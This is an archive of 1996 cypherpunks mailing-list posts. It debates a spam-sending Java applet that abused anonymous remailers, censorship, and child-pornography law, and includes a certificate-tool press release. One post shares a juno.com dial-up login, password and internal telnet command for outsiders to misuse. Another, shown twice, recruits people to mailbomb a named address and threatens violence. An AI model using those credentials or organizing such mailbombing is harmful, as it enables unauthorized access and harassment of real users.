Yours with the greatest respect: Paul Bradley MbM Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don't forget to mount a scratch monkey" From geoffw at precipice.V-site.net Wed Sep 11 19:06:33 1996 From: geoffw at precipice.V-site.net (Geoff White) Date: Thu, 12 Sep 1996 10:06:33 +0800 Subject: The saga of hipcrime's emailBot (fwd) Message-ID: ---------- Forwarded message ---------- Date: Wed, 11 Sep 1996 13:25:20 -0700 (PDT) From: Geoff White To: cyperpunks at toad.com Cc: Geoff White , Stark Raving Math Subject: The saga of hipcrime's emailBot Hi Folks, Some of you may know me as I was once on cypherpunks about 2 years ago, other pressing matters (like starting an ISDN ISP :) caused me to unsub but I've still been with you in spirit :) Anyway, I run Virtual Sites (v-site.net) Having been squeezed out of InterNex by various methods that we won't go into here. Anyway V-site primarily hosts web-space although we also have a bunch of ISDN and Frame Relay customers as well, but our primary business is web-hosting. Robert of hipcrime.com is a "customer" of mine, actually I gave him a free account so that he could learn Java, CGI and other forms of web programming, I do give accounts to groups, organizations and people who show promise and Robert's fractal creations are outstanding. Anyway, it's not my nature to be a policeman and to look over the shoulder of my customers, as long as they don't draw attention to themselves I leave them alone. I was surprised that Robert brought such attention to himself the other day. 
I fully understand where you are coming from with regards to the remailers being a "touchy situation" at best but also bear in mind that Robert has pointed out an important "weakness", even though the website is no longer dispensing the offending applet, Java code lasts forever, so the applets that are free will continue to work until they are deleted. Since they reference the sendmail daemon on tarnover.v-site.net, the only recourse that I have is to shutdown the sendmail daemon but other customers rely on that daemon for their businesses. So what is to be done? I think this exposes a serious problem with Java applets and with the remailing system. I'm willing to do my part to help stem the tide but bear in mind that this kind of thing can and will happen again unless a better way to guard against this type of thing is implemented. Geoff White WebMaster Virtual Sites From dlv at bwalk.dm.com Wed Sep 11 19:07:04 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 12 Sep 1996 10:07:04 +0800 Subject: Did someone from juno.com say "hacking"? Message-ID: <8Jy4TD1w165w@bwalk.dm.com> Attention wannabe hackers from juno.com: Wanna lose your juno account fast? call 1-800-575-4516 with a modem log in as junox13, password wiujuywe type ? for the list of commands... One interesting command that works is telnet x13.boston.juno.com 1793 /stream Another interesting number is 1-800-328-2427. They also have a load of local numbers. One can also call their tech support (voice) at 1-800-586-6889 One can e-mail Charles Ardai at president at juno.com and ask him to be added to the kiddie porn mailing list. The possibilities are endless. But hurry! The holes may be closed soon. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From nobody at flame.alias.net Wed Sep 11 19:26:42 1996 From: nobody at flame.alias.net (Anonymous) Date: Thu, 12 Sep 1996 10:26:42 +0800 Subject: HipCrime and Spam Message-ID: <199609112052.WAA02693@basement.replay.com> HipCrime wrote: > Be honest, all you really care about is something which > "threatens the existence" your little baby. I think you were referring to yourself, Robert. :) Since you don't seem to understand the concept of spam very well yet, try this little experiment: Go downtown to City Hall and post advertisements for your website on all the walls and doors. Be sure to put one on the Mayor's office and all the members of the City Council. If they complain, explain to them why they are weak-minded souls who can't remove unwanted messages. Go to the local art gallery and post your signs all over. Tell people that since your web site is an "art project", that you are posting EXACTLY on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" Pass out survey forms. Ask people where they want to see advertisements. Go to these sites and spray-paint your http address. If people complain that you are "harassing" them, ask them why a whopping eighteen letters written on the wall is harassment. Tell them it's not *your* fault, that you're just doing what other people told you to. Explain how many trees you are saving by using spray-paint instead of paper. When the police handcuff you and take you away, complain that they are censoring you. Tell the judge that you want to sue the cops for violating your civil rights. While you're in jail, think about why what you did was wrong. 
From robert at precipice.v-site.net Wed Sep 11 19:32:24 1996 From: robert at precipice.v-site.net (HipCrime) Date: Thu, 12 Sep 1996 10:32:24 +0800 Subject: HipCrime and Spam Message-ID: <32372622.43F6@precipice.v-site.net> >Go downtown to City Hall and post advertisements for your website on >all the walls and doors. Be sure to put one on the Mayor's office and >all the members of the City Council. If they complain, explain to them >why they are weak-minded souls who can't remove unwanted messages. You guys OBVIOUSLY confuse reality with cyberspace. Graffiti is actual property damage. A message in an EmailBox is a long, long way from being comparable. Let's make use of that "education" that seems to make you so proud. -- Security is mostly a superstition. It does not exist in nature, nor do the children of men as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure, or nothing. -- Helen Keller From stewarts at ix.netcom.com Wed Sep 11 19:42:02 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 10:42:02 +0800 Subject: ISODE Consortium X.509 Certification system Message-ID: <199609112356.TAA16491@attrh1.attrh.att.com> 15 August 1996 ISODE Consortium Delivers an X.509 Certification Authority The ISODE Consortium has delivered a new security management tool, Caviar, designed to create and manage a Certification Authority (CA) for the deployment of the X.509 Authentication Framework. Caviar, a Tcl/Tk utility, enables an administrator to effectively manage public keys and certificates so that data transmission can be provided securely across networks. The tool allows the administrator to create a CA, to generate, locate and revoke certificates, to manipulate user keys, and to construct certificate revocation lists. Public key cryptography is widely used to deliver secure data transmission.
The generation and control of public keys, however, require management, and for this purpose, X.509 describes the notion of a 'trusted' authority referred to as the Certification Authority. The CA is responsible for endorsing the identity of users whose details may be held in the X.500 Directory, and the CA issues a certificate to authenticate the user's name and public key. The Caviar tool, using an intuitive graphical user interface, enables an administrator to create and manage these certificates easily. Tcl/Tk is a graphical scripting language openly available from Sun Microsystems Laboratories. Scripting languages provide inherent flexibility and extensibility, and Tcl/Tk is portable to a wide range of UNIX (X Windows) and Microsoft (Windows) platforms. Behind the graphical user interface, Caviar has an underlying command mode tool kit, which can be used if individual commands may more easily integrate into operational environments. Furthermore, Tcl/Tk allows a high degree of customization, which enables ISODE Consortium customers to develop their own scripts and graphical user interfaces for specific applications based on Caviar. The ITU-T, through X.509, recommend strong authentication based on public key cryptosystems as the basis for providing secure services. The ISODE Consortium uses X.509 as the core of its security strategy. X.509 provides a flexible, scaleable and manageable algorithm-independent authentication infrastructure, which can be used as the basis for a wide range of security services such as message encryption and access control. The ISODE Consortium is the leading supplier of source technology for open messaging, directory and security services. The primary server products are an Internet/X.500 Directory Server, an Internet/X.400 Message Transfer Agent, and a Message Store. These products provide connectivity within and between organizations in a multi-vendor environment. 
The ISODE Consortium has a world-wide customer base of over 170 clients including some of the largest commercial value-added resellers, service providers and research organizations. For further information please contact: Gill Greenwood, International Marketing Communications Manager ISODE Consortium Limited, The Dome, The Square, Richmond, TW9 1DT, UK Telephone: +44 181 332 9091 Fax: +44 181 332 9019 Internet: g.greenwood at isode.com WWW: http://www.isode.com/ ISODE is a trademark of ISODE Consortium Limited UNIX is a registered trademark in the United States and other countries licensed exclusively through X/Open Company Limited. Microsoft is a registered trademark of Microsoft Corporation # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From mpd at netcom.com Wed Sep 11 19:43:47 1996 From: mpd at netcom.com (Mike Duvos) Date: Thu, 12 Sep 1996 10:43:47 +0800 Subject: Child porn as thoughtcrime Message-ID: <199609112051.NAA25165@netcom2.netcom.com> frantz at netcom.com (Bill Frantz) writes: > It seems to me that the logic of these answers would make > the movie, "Carried Away" illegal. According to a Boston > Globe review (reprinted in the local rag), "... his > character cheats on his longtime girlfriend with a new > student who's only 17, ..." Depending on how this is > depicted in the movie (Rated R), it seems to me that this > could go over Hatch's line. (BTW, the review rates the movie > 3 stars out of a possible 4.) This is an interesting point. There are a plethora of foreign films, and some domestic ones, which contain frontal nudity by persons under 18, as well as suggestions and sometimes even fairly explicit depictions of acts such as masturbation or sex between adolescents or (horrors) between an adolescent and an adult. 
None of these films has a rating worse than an (R) from the censors at the MPAA, and a lot of them have glowing reviews singing their praises by the likes of Siskel and Ebert, Judith Crist, and John Hartl. Paradoxically, the US Government has never prosecuted a mainstream film under child pornography laws, evidently feeling that this was a can of worms they didn't dare open, or at the very least, not wanting to risk losing the case and establishing a precedent So while people are getting prosecuted for a grainy computer picture they downloaded from the Internet, which some pediatric "expert" testifies "appears to depict a minor", such glowing cinematic moments such as the hardon comparison scene in Bernardo Bertolucci's "1900", or Jill Clayburgh masturbating her teenage son to orgasm in "Luna", are freely available to anyone who wants them, and even get shown on Premium Cable to boot. Not to mention the child nudity in films ranging from the ancient "Macbeth" to the adolescent boy loves boy epic "You Are Not Alone." Showtime must have run David Hamilton's "Tendres Cousines" at least a zillion times when it was first released, as well as prominently featuring it in their weekly softcore erotica slot, even though it featured the rather explicit seduction of a 14 year old boy by an older girl, complete with nudity, flushed cheeks, and panting orgasms. If the Hatch bill in one form or another passes, will the government still continue to ignore the art film market in its quest to stamp out depictions of child sex? How will the artistic community react when the feds start throwing people in jail, and burning the master prints of critically aclaimed films, under the excuse that the mere existence of such material "sexualizes" children and "encourages child abuse?" Should make for some interesting court tests. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. 
$ From wic at gnn.com Wed Sep 11 19:47:32 1996 From: wic at gnn.com (wic at gnn.com) Date: Thu, 12 Sep 1996 10:47:32 +0800 Subject: Thanks! Message-ID: <9609112107.AA21781@ebay.gnn.com> Thanks for your message! As of August 1st, 1996, GNN Select has joined forces with WebCrawler to become WebCrawler Select. Our new URL is http://webcrawler.com/ Submissions to WebCrawler will also be considered for inclusion in WebCrawler Select. The WebCrawler submission form is available at: http://webcrawler.com/WebCrawler/SubmitURLS.html If you have a question, comment, or suggestion for us, bypass the submission form and send us mail at wc at webcrawler.com . We will get back to you as soon as we can. Best regards, Abbot Chambers Managing Editor WebCrawler Select ---------------------------------------------------------- From stewarts at ix.netcom.com Wed Sep 11 19:49:07 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 10:49:07 +0800 Subject: Satellite Movement? Message-ID: <199609112356.TAA16477@attrh1.attrh.att.com> >Blak Dayz wrote: >> I was out buying groceries and after they scanned the shit through they >> told me that all the ATMs in the City were out due to connection problems. So i >> go home and start trying to scan for the shits and i cant find them. If anyone >> knows what the hell happened i would appreciate the details. I believe it may >> have been a solar flare that caused the companies to redirect their satellites. Alternatively, it may be that the host earth station that the VSAT providers uses was affected by the hurricane. But different ATM providers use different technologies for connecting their ATM networks, and may mix technologies if that's cheapest. VSATs are one approach, leased lines another (generally multidrop with ugly IBMish protocols), X.25 networks, frame relay networks, etc. Maybe all the ATM machines run by your bank were out. 
But taking out all the ATM machines in a money-using city like New York would require some major disaster, like a nuclear explosion or a stupid regulation written by a government official. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From saione at primenet.com Wed Sep 11 20:09:15 1996 From: saione at primenet.com (saione at primenet.com) Date: Thu, 12 Sep 1996 11:09:15 +0800 Subject: talker Message-ID: <199609120013.RAA23608@primenet.com> CC`d to cypherpunks mailing list: I recieved this this afternoon (11/9/96), this has gone far enough, would anyone here care to join me in mailbombing this guy? just reply this mail to him at doom13 at juno.com about 100 times or so, if we get about 100 people to do this it should generate enough traffic to close his account down. my reply to his mail is at the bottom: > Listen up you son of a bitch! Don't fucker call me a peice of horse shit > you cocksucker or I'll mailbomb your ass so many times you won't even > think of replying. You don't know shit about my hacking mother fucker. > Fuck you and go suck on some media crypto pussy shit. Listen you spotty socially unskilled adolescent masturbator: Your petty and pathetic claims amuse me, I laugh at your worthless and dirty existance peon. What have you ever hacked, have you broken any encryption codes, have you found security weaknesses by new and ingenious methods, have you practised within the hacker ethic? I think not You are a *WANNABEE*, a punk who knows not the slightest thing about systems security, can`t code, and couldn`t hack his way out of a wet paper bag, your mailbombing threats are about as technical as you can get. in addition your flames show no linguistic creativity, just a bunch of crude words thrown together, get an education you trailer butt-fucker. 
Mailbomb me, go ahead punk, make my day, if you dare to even think about doing so I will kick your ass, I will hurt you in ways you cannot imagine, I have carried out vindictive personal vendettas before and will do so again if necessary. Go on, I dare you, I double dare you motherfucker. Yours with the greatest respect: Paul Bradley MbM Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From Adamsc at io-online.com Wed Sep 11 20:09:28 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 12 Sep 1996 11:09:28 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <19960911210106453.AAA160@IO-ONLINE.COM> On Wed, 11 Sep 1996 14:00:24 +0200 (MET DST), Stephan Schmidt wrote: >If a hacker is able to phone using the number >0171 / 3 28 99 66 in Germany with a hacked code, >the company will pay 100.000 DM (~65.000$) to a non >profit organisation of the hackers choice. ^^^^^^^^^^^^^^^^^^ I'm setting up a nonprofit organization: The Chris Adams PentiumPRO Fund. Please support it! Seems like a fake test. If they were giving out $64k to the hacker, you'd see a LOT of intrest! Hackers just tend not to be the most concerned with the problems of others... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell From bdavis at thepoint.net Wed Sep 11 20:23:30 1996 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 12 Sep 1996 11:23:30 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: On Wed, 11 Sep 1996, jonathon wrote: > On Wed, 11 Sep 1996, Gary Howland wrote: > > > > But the public *is* asked to assent to those methods - your chance to vote > > > on them is known colloquially as "jury duty". > > But judges have said that Jury Nullification is not acceptable > legal practice. And other judges have said the opposite. EBD ... From saione at primenet.com Wed Sep 11 20:29:02 1996 From: saione at primenet.com (saione at primenet.com) Date: Thu, 12 Sep 1996 11:29:02 +0800 Subject: talker Message-ID: <199609120013.RAA23678@primenet.com> CC`d to cypherpunks mailing list: I recieved this this afternoon (11/9/96), this has gone far enough, would anyone here care to join me in mailbombing this guy? just reply this mail to him at doom13 at juno.com about 100 times or so, if we get about 100 people to do this it should generate enough traffic to close his account down. my reply to his mail is at the bottom: > Listen up you son of a bitch! Don't fucker call me a peice of horse shit > you cocksucker or I'll mailbomb your ass so many times you won't even > think of replying. You don't know shit about my hacking mother fucker. > Fuck you and go suck on some media crypto pussy shit. Listen you spotty socially unskilled adolescent masturbator: Your petty and pathetic claims amuse me, I laugh at your worthless and dirty existance peon. What have you ever hacked, have you broken any encryption codes, have you found security weaknesses by new and ingenious methods, have you practised within the hacker ethic? I think not You are a *WANNABEE*, a punk who knows not the slightest thing about systems security, can`t code, and couldn`t hack his way out of a wet paper bag, your mailbombing threats are about as technical as you can get. 
in addition your flames show no linguistic creativity, just a bunch of crude words thrown together, get an education you trailer butt-fucker. Mailbomb me, go ahead punk, make my day, if you dare to even think about doing so I will kick your ass, I will hurt you in ways you cannot imagine, I have carried out vindictive personal vendettas before and will do so again if necessary. Go on, I dare you, I double dare you motherfucker. Yours with the greatest respect: Paul Bradley MbM Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From eb at comsec.com Wed Sep 11 20:41:59 1996 From: eb at comsec.com (Eric Blossom) Date: Thu, 12 Sep 1996 11:41:59 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609070220.WAA01026@wauug.erols.com> Message-ID: <199609112344.QAA02699@comsec.com> > Try and pay cash in most Fedex offices. Not a problem in my neighborhood, but I do notice that they write "CASH" in large letters on the airbill. I suppose that this gets the package extra attention. From watson at tds.com Wed Sep 11 20:50:03 1996 From: watson at tds.com (watson at tds.com) Date: Thu, 12 Sep 1996 11:50:03 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609112133.OAA08338@mailman.tds.com> NetSurfer said: If you know a valid email address on the spammers system you can always bounce each message back to them. If enough people turned the messages back on them it might give them the opportunity to experience first hand what its like to receive tons of mail you don't want or need...
Doesn't seem to work that well. The "green card lawyers" were reported to have received hate-mail in the hundreds of thousands. They happily waded through it all and pulled out a few valid replies who apparently made it all a net profit for them, apparently. What we really need is to improve our defensive filtering mechanisms. Someday soon we'll all have our own personal software agents that will handle all this stuff for us. Optimistic Dave From robert at precipice.v-site.net Wed Sep 11 20:56:01 1996 From: robert at precipice.v-site.net (HipCrime) Date: Thu, 12 Sep 1996 11:56:01 +0800 Subject: [Fwd: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]] Message-ID: <32373072.3E41@precipice.v-site.net> Does this maillist filter out messages from NON-subscribers? To: HipCrime Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] From: Admin Date: Wed, 11 Sep 1996 15:14:26 -0600 Cc: CYPERPUNKS at TOAD.COM, Geoff White , , jlasser at rwd.goucher.edu At 01:52 PM 9/11/96 -0700, you wrote: This is an absurd and inaccurate analogy. The mailBot simply pushes *mailto:* tags that people have willingly placed on their public websites. They invite the mail so a more accurate analogy would be that City Hall puts up a public suggestion box and invites comments. The bot then puts one, and only one, unsigned anonymous suggestion into the box. It then goes on to the Art Gallery where they too have put up a public suggestion box, and the bot places one, and only one, anonymous suggestion in that box also...and it moves on to the next publicly accessible suggestion box that it finds, each time putting in one, and only one, message. Can the College-aged mind these days not develop a rational, concise, accurate and logical analogy that stays on point? Think about it... or take down the public suggestion boxes if one doesn't like what one finds inside. If you invite feedback...it will come.
admin There is > >HipCrime wrote: >> Be honest, all you really care about is something which >> "threatens the existence" your little baby. > >I think you were referring to yourself, Robert. :) > > >Since you don't seem to understand the concept of spam very well yet, >try this little experiment: > >Go downtown to City Hall and post advertisements for your website on >all the walls and doors. Be sure to put one on the Mayor's office and >all the members of the City Council. If they complain, explain to them >why they are weak-minded souls who can't remove unwanted messages. > >Go to the local art gallery and post your signs all over. Tell people >that since your web site is an "art project", that you are posting EXACTLY >on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" > >Pass out survey forms. Ask people where they want to see advertisements. >Go to these sites and spray-paint your http address. If people complain >that you are "harassing" them, ask them why a whopping eighteen letters >written on the wall is harassment. Tell them it's not *your* fault, >that you're just doing what other people told you to. Explain how many >trees you are saving by using spray-paint instead of paper. > >When the police handcuff you and take you away, complain that they are >censoring you. Tell the judge that you want to sue the cops for violating >your civil rights. While you're in jail, think about why what you did >was wrong. > <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9¢/min |Helping hardworking people || ||9.9¢ Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service.
|| <>-----------------------1_303_692_5190------------------------<> From stewarts at ix.netcom.com Wed Sep 11 20:59:31 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 11:59:31 +0800 Subject: NewsBytes ****Singapore - Leased Line Customers Bypass Censorship Message-ID: <199609112142.RAA23085@attrh1.attrh.att.com> ****Singapore - Leased Line Customers Bypass Censorship By Martyn Williams. Individual users of the Internet in Singapore may not be able to access the latest online images from Playboy after next Monday, but those at major corporations and large companies will find no restrictions to their World Wide Web surfing. [Newsbytes, (I just have the header, not the full article; sorry.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From chuck at nova1.net Wed Sep 11 21:05:49 1996 From: chuck at nova1.net (Chuck Thompson) Date: Thu, 12 Sep 1996 12:05:49 +0800 Subject: Child porn as thoughtcrime Message-ID: <1.5.4.32.19960911220622.0067ad04@mail.nova-net.net> Well Andrew, pornography is meant to lead to arousal, which can lead to aggression, which may lead to abuse. It's a fairly common path according to what I've read on deviancy. Following is one association's opinion, but don't stop there, read for yourself what some of the deviants themselves have to say: An excerpt from the American Pyschiatric Association > The argument is not dependent upon whether or not actual >> children are used, any more than whether or not an actual gun >> is used in a robbery - the net effect is the same. Children >> are harmed by the promotion of child porn because it leads to >> the abuse/exploitation of kids. > >I don't believe you. Prove that drawings of children having sex leads to >the abuse/explaitation of kids. Provide some evidence... 
> > >andrew > Regards, Chuck Thompson From andy at CCMSD.chem.uga.edu Wed Sep 11 21:11:24 1996 From: andy at CCMSD.chem.uga.edu (Andy Dustman) Date: Thu, 12 Sep 1996 12:11:24 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609112124.PAA11039@rintintin.Colorado.EDU> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 11 Sep 1996, Admin wrote: > >This is an absurd and inaccurate analogy. The mailBot simply pushes > >*mailto:* tags that people have willingly placed on their public websites. > >They invite the mail so a more accurate analogy would be that City Hall puts > >up a public suggestion box and invites comments. The bot then puts one, and > >only one, unsigned anonymous suggestion into the box. It then goes on to the You're sending out messages, inviting people to visit your web site, but you're using anonymous remailers because... you don't want people to know who you are? Then why invite them to your site (or even have a site)? It's like if I sent out postcards to people with no return address saying, "Please stop by 1313 Mockingbird Lane for snacks and refreshments. Signed, A Friend". (Note, this is not my real address.) Only in this case the postcards don't have any stamps so the people who receive them have to pay the postage. Which is precisely what you're doing: Sending someone e-mail costs them time and it often costs them money. Sending it through an anonymous remailer accomplishes four things: 1) People can't complain to you to stop sending them mail. 2) It costs us, the International Secret Cabal of Anonymous Remailer Operators, time and money for no good reason, because you are sending anonymous mail and not making yourself anonymous. 3) You're pissing off a bunch of people, and the only ones they can take their frustrations out on or complain to is us. 4) It's giving us a bad rap, man, and that's the *last* thing the remailer net needs now. 
I could care less about your little applet, or what you have to say; in the words of Thomas Jefferson, "it neither breaks my leg nor picks my pocket." Until, that is, you start sending it through my remailer, and *then* you start picking my pocket. The remailers of the world don't exist to provide non-anonymous anonymous advertising, which you could do just as well on your own sending forged e-mail headers from netcom. Andy Dustman / Computational Center for Molecular Structure and Design / UGA ===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjdoky0jMb7JduJJAQGEhAQAt6t18GgMP3v6axTGtNiUHXwNN7UR/V+F XAZtvTXgg9KFR+ZwnfJz3IMrry0aQCNMC2Ude7mldFyfq8FqVVrA6sE26rwYvWUS U3C3SCiDXhp3rn9RDfbWV8mZcnC6IRHYz9o5qyuhZTfvGdlZr7/nDTOZZPO7icCN MiYEGcjJzqY= =l0Ek -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Wed Sep 11 21:12:46 1996 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Thu, 12 Sep 1996 12:12:46 +0800 Subject: Unsolicited harrassing e-mail from In-Reply-To: <199609112356.TAA16511@attrh1.attrh.att.com> Message-ID: Please stop e-mailing me, cc:ing me, or otherwise harrassing me. I have no connection with the thread you're quoting and don't want to receive any more e-mail from you. stewarts at ix.netcom.com writes: > >> There > >> are a number of anonymous remailers out in cyberspace, but it has been > >> stated by a knowledgeable source that a number of them are being operated > >> by law enforcement agencies (presumably to troll for criminal activity). A > > > >Can someone verify/discredit/comment on this statement? Who is the > >knowledgeable source? > > Definitely true. Zero is a number, and there are also larger numbers. > KOTM = Kook Of The Month. 
> > # Thanks; Bill > # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com > # > # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto > From blancw at microsoft.com Wed Sep 11 21:17:22 1996 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 12 Sep 1996 12:17:22 +0800 Subject: Child Porn as Thoughtcrime Message-ID: >From: Chuck Thompson , a True Believer, inquired: > >What in the devil are you trying to say? Maybe I'm one of those stupid >citizen units. I just don't get it - I'd like to, but I don't. How about >rephrasing your comments so that us average citizen units can understand >your wisdom. >........................................................... > > >Well then I'll spell it out for you: > >. I actually said that it is "a government" which will posture as >sympathetic towards the whiningH^H^H^H^H^Hconcerns of citizens. > >. Political candidates very well know that citizens (voters) are looking for >someone to save them from what ails them. Therefore many candidates will >make the right statements about upholding similar values. They start making >sounds like they are going to "do something about it" (about whatever the >latest issue is). And their supporters will like these sounds. Reagan >made a quote about this sometime, something like: "They may not hear the >lyrics, but they hear the music." The voters feel good because they expect >that their discomfort will be taken care of. Therefore they vote for the >candidate most positive towards their needs. The candidate is elected to >the office for which they are running and thereby achieve their goal. > >. The more that voters seek the attention of government assistance for their >myriad problems, the more that the sphere of government involvement in the >details of everyone's daily lives enlarges. This enlargement of the >government sphere of involvement, as encouraged by citizens, expands as >people find more things to complain about. 
The more personal control over >their problems which they abdicate to the government, the more control it >accrues. > >. Of course a government does not want to appear to be in totalitarian >control. Many citizens do want *someone* to be in control, however. They >want a benevolent overseer to be in control. As the scope of benevolent >services, as controlled by government, spreads out across the land, many >people are happy that someone is in control. > >. Some people are so happy about benevolent government control that they >want it extended towards things like their own moral preferences. Any time >that they see the evidence of anything contrary to their own moral >preferences, they want these visible signs of contrariness removed. Moral >preferences and how they relate to national circumstances are a tricky >subject for governors and legislators. But if it makes the citizens happy >and keeps the governors in office, they are willing to oblige in removing >these offenses by pursuing the "offenders". > > . Reducing the expressions of these offenders helps the governors, because >it enhances their position of control. It helps to legitimize their >activities and again enlarges their arena, their domain, of command. They >can become quite meticulous in determining what may or may not be expressed >or said which might be offensive to someone - in particular, to themselves >(because it may weaken their image of being benevolent and "in command" of >the situation). > >. At that point, anyone who can think in the abstract will be able to see >that, as expression derives from thought, that what is wrong therefore with >all of the "offenders" is their thoughts. That is why TC May called this >kind of offense the equivalent of "thought crime". There is a book about >"thought crimes" against the State which you may have heard about, though you >may not have read. > >. Thought and its relationship to the State is a deep and complex >philosophical subject. 
There are many posts in the cpunk archives which can >provide you with insights into the anarcho-capitalist libertarian position. > >. If you need any more details on "thought criminality", maybe Tim can >answer them for you, as he's the one who brought up the subject. I was >merely agreeing with him. > > .. >Blanc > > From frissell at panix.com Wed Sep 11 21:18:44 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 12 Sep 1996 12:18:44 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <2.2.32.19960911220537.00b17214@panix.com> At 07:43 PM 9/10/96 -0500, Declan McCullagh wrote: >I respectfully disagree. I spend most of my time going through sites like >cnn.com, hotwired.com, news.com, altavista.digital.com, yahoo.com, >lycos.com, hotbot.com, eff.org, well.com, mit.edu, whitehouse.gov, and so >on. Search engines and directories, in particular, are good chokepoints to >block. > >Blocking 100 sites would certainly be significant to me -- as long as >they're the right ones. Before the technical fixes, that is. But aren't you, the Nazis, Lee Kwan Yew, and the Heathen Chinee all committing the "Web Fallacy" -- the belief that the Web = The Net? Have you seen *any* examples of mailing list censorship? Even the mild newsgroup censorship attempts are easily dodged by picking up your news from a distant server (which is not a *technological* fix but an ordinary part of reading news since many ISPs don't carry all 30K of groups in any case). If almost all sites are ignored, if news is available from thousands of servers, and if mailing lists, IRC, telnet, ftp, gopher, etc are ignored; can we say that there is much actual net censorship going on? DCF "The Net -- where any 12 year old can defeat the governments of the world with 15 minutes work." 
From proff at suburbia.net Wed Sep 11 21:56:50 1996 From: proff at suburbia.net (Julian Assange) Date: Thu, 12 Sep 1996 12:56:50 +0800 Subject: talker In-Reply-To: <199609120013.RAA23678@primenet.com> Message-ID: <199609120227.MAA03680@suburbia.net> > Mailbomb me, go ahead punk, make my day, if you dare to even think > about doing so I will kick your ass, I will hurt you in ways you > cannot imagine, I have carried out vindictive personal vendettas > before and will do so again if necessary. > > Go on, I dare you, I double dare you motherfucker. > > Yours with the greatest respect: > > Paul Bradley MbM Yawn. Says more about you than him kiddo. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From declan at eff.org Wed Sep 11 22:02:24 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 12 Sep 1996 13:02:24 +0800 Subject: (Fnord) Edupage, 10 September 1996 In-Reply-To: <199609111822.LAA15291@netcom7.netcom.com> Message-ID: Ah, but first we make the use of non-escrowed crypto a felony. Then if the bad guys use it we can put 'em away for another five years. Simple. No, really. -Declan On Wed, 11 Sep 1996, Bill Frantz wrote: > I'm preaching to the choir, but I can't resist. 
